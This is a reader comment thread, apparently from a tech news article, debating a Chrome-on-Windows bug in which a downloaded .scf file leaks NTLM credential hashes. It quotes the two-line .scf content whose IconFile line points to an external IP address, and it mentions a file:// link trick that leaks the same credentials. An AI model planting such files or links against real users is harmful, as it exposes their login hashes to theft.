
If the .scf file contains this code:
> [Shell]
> IconFile=\\170.170.170.170\icon
Surely most corporate networks will block almost all external IP's though?
Google's Chrome team is working to fix a credential theft bug that strikes if the browser is running on Microsoft Windows. The bug is exploited if a user is tricked into clicking a link that downloads a Windows .scf file (the ancient Shell Command File format, a shortcut to Show Desktop since Windows 98). This exploits two …
"To retrieve the icon, the user's machine will present credentials to a server – their user ID and hashed password on a corporate network, or the home group's credentials if it's a personal machine."
I believe this to be a non-issue. On my home network I have quite a few machines which I use to connect to, and which shares are protected with a username/password combination. I also always click the "remember" checkbox to keep things easy on me.
So here's the thing: every time I reset my computer then Windows 7 will ask me for my credentials all over again. It literally doesn't remember squat whenever you rebooted. Now in all fairness I must point out that I'm using Windows 7 with a non-administrative account. But wouldn't that also apply to those computers in an corporate / enterprise network?
So yeah, I can't help wonder if this issue is really as big as is being claimed.
Yes, with all the attention given to SMB lately most companies will block that traffic outbound. But there are many, many smaller companies who have those systems handled by someone else, even their ISP. Or they bought something and once they had connectivity they left it alone. They are at risk as is the home user. No, the credentials will not have to be typed manually on business devices. That's all handled transparently. Given how fast Google automatically patches things this probably is a non-issue.
Chrome in this case appears to be doing _exactly_ what it is told to do. That being to download a file and store it in the file system.
The actual issue, that a shortcut file can cause your machine to attempt to communicate with a third party just by opening the directory it is stored in would seem to me to be more of a Windows issue.
Or am I wrong?
Wait... Windows cheerfully reveals its hashed login info to any IP in the two-line text file just by being in the directory a user viewed, and it's Chrome that has a bug because it faithfully downloads the file without screwing with the filename?
I don't see that as a bug. If it renames the file without permission, though, I would see THAT as a bug.
"Tricking" IE into connecting to file://\\example.com/ leaks NTLM credentials.
2016: https://www.perfect-privacy.com/blog/2016/08/01/security-issue-in-windows-leaks-login-data/
1997: http://insecure.org/sploits/winnt.automatic.authentication.html
MS claims that this is the correct behaviour and you should filter outgoing connections if you don't like it.